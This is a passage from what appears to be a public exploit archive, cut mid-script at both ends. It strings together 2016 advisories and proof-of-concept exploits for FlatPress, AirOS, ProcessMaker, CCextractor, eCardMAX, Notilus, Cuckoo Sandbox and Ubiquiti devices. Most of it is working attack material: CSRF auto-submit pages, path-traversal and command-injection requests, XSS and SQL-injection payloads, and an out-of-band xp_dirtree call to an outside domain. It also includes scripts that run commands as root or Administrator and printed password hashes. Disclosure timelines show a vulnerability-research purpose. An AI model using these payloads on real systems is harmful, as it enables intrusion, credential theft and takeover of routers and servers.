"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
"Content-Disposition: form-data; name=\"upload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>Upload test.php file!</button>
</form><br />
<form action="javascript:exec()">
<input type="text" id="exec" placeholder="Enter a command">
<input type="submit" value="Execute!">
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>
# AirOS NanoStation M2 v5.6-beta
# Arbitrary File Download & Remote Command Execution
# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
# Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
#
# Date: May 30, 2016
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Valid credentials are required !.
# Most of devices run default factory user/passwd combination (ubnt:ubnt)
# Take a look at /usr/www/scr.cgi
<?
include("lib/settings.inc");
include("lib/system.inc");
$filename = $fname + ".sh";
$file = $fname + $status;
header("Content-Type: application/force-download");
header("Content-Disposition: attachment; filename=" + $filename);
passthru("cat /tmp/persistent/$file");
exit;
# Arbitrary File Download
# Poc:
GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
# Remote Command Execution:
# Poc:
GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
Base64 Decoded: 127.0.0.1 localhost.localdomain localhost
######################################################################
# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
# Date: 31/05/2016
# Author: Mickael Dorigny @ information-security.fr
# Vendor or Software Link: http://www.processmaker.com/
# Version: 3.0.1.7
# Category: Multiple Vulnerabilities
######################################################################
ProcessMaker description :
======================================================================
ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
Vulnerabilities description :
======================================================================
ProcessMaker v3.0.1.7 is vulnerable to multiple vulnerabilities like :
- Reflected XSS
- Stored XSS
- CSRF (x2)
PoC n°1 - CSRF on Designer Project Creation
======================================================================
Designer Project creation process is vulnerable to CSRF vulnerability. a forged request can be used to force an authentified user with designer project creation rights to create a new Designer project.
PoC:
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://serversysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
<input type=text name=PRO_TITLE value=XXX>
<input type=text name=PRO_DESCRIPTION value=XXX>
<input type=text name=PRO_CATEGORY value="">
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Note that this CSRF vulnerability can be combined with the PoC n°3 that expose a stored XSS vulnerability in the Description input of Designer Project.
Proof of Concept n°2 - CSRF on group creation
======================================================================
Group creation process is vulnerable to CSRF vulnerability, a forged request can be used to force an authentified user with admin rights to create a new group.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
[POSTDATA]
name=swdcs&status=1
The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
<input type=text name=name value=2>
<input type=text name=status value=1>
<input type=submit>
</form>
<script>
window.onload = function(){
document.forms['form1'].submit()
}
</script>
Proof of Concept n°3 - Stored XSS on Designer Project Creation
======================================================================
The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
PoC
[REQUEST]
http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
[POSTDATA]
PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
Note that this CSRF vulnerability can be combined with the PoC n°1 that expose a CSRF vulnerability in the Designer Project creation process.
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page
Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication :
======================================================================
The search form in the Design Project can redirect user to a blank page without HTML code. This page display some information including user request. We can use this situation to execute JavaScript instruction into browser's user.
Note that a search request use POST transmission method, to exploit this vulnerability, an attacker need to trap a user to visit a HTML form with auto-submit Javascript tricks to generate the forged request.
PoC :
[REQUEST]
http://server/sysworkflow/en/neoclassic/processes/processesList
[POSTDATA]
processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page.
Solution:
======================================================================
- Update your Process Manager installation to superior version
Additional resources :
======================================================================
- https://www.youtube.com/watch?v=TO2Fu-pbLI8
- http://www.processmaker.com/
Report timeline :
======================================================================
2016-01-26 : Editor informed for vulnerabilities
2016-01-27 : Editor response, fixes will be part of the next release
2016-05-25 : 3.0.1.8 is released with vulnerabilities corrections
2016-05-31 : Advisory release
Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr
# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
from subprocess import call
from shlex import split
from time import sleep
def crash():
command = './ccextractor crash'
buffer = '\x00\x00\x00\x04ssixssixs'
with open('crash', 'w+b') as file:
file.write(buffer)
try:
call(split(command))
print("Exploit successful! ")
except:
print("Error: Something has gone wrong!")
def main():
print("Author: David Silveiro ")
print(" CCextractor 0.80 Access Violation Crash ")
sleep(2)
crash()
if __name__ == "__main__":
main()
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
[Software]
- eCardMAX 10.5
[Vendor]
- eCardMAX.COM - http://www.ecardmax.com/
[Vendor Product Description]
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
with eCardMax is fast and easy.
[Advisory Timeline]
- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Reflected)
[Impact]
- High
[Affected Version]
- v10.5
[Tested on]
- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll
[Bug Description and Proof of Concept]
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
[Proof-of-Concept]
1. SQL Injection:
Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: DIMO Software
Product & Version:
Notilus travel solution software v2012 R3
Vendor URL & Download:
http://www.notilus.com/
Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."
(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.
Proof of concept:
POST TO /company/profilv4/Password.aspx
Vulnerable parameter: H_OLD
Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27
(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.
(4)Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.
(5) Credits:
------------
Discovered by Alex Haynes
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
exectuted with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################*
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
